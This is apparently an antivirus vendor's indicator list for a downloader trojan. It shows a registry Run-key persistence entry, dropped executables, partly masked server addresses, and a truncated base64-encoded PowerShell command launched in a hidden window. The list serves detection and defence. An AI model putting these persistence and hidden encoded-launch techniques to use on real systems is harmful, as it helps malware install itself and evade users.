Technical information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'buildermetered' = '"%LOCALAPPDATA%\buildermetered\buildermetered.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...
- %HOMEPATH%\853.exe
- %HOMEPATH%\853.exe to %LOCALAPPDATA%\buildermetered\buildermetered.exe
- '11#.#19.233.65':80
- http://ta####ingshop.com/c1/ftcfak9456/
- http://11#.#19.233.65/codec/entries/ringin/merge/
- '%HOMEPATH%\853.exe'
- '%LOCALAPPDATA%\buildermetered\buildermetered.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...' (with a hidden window)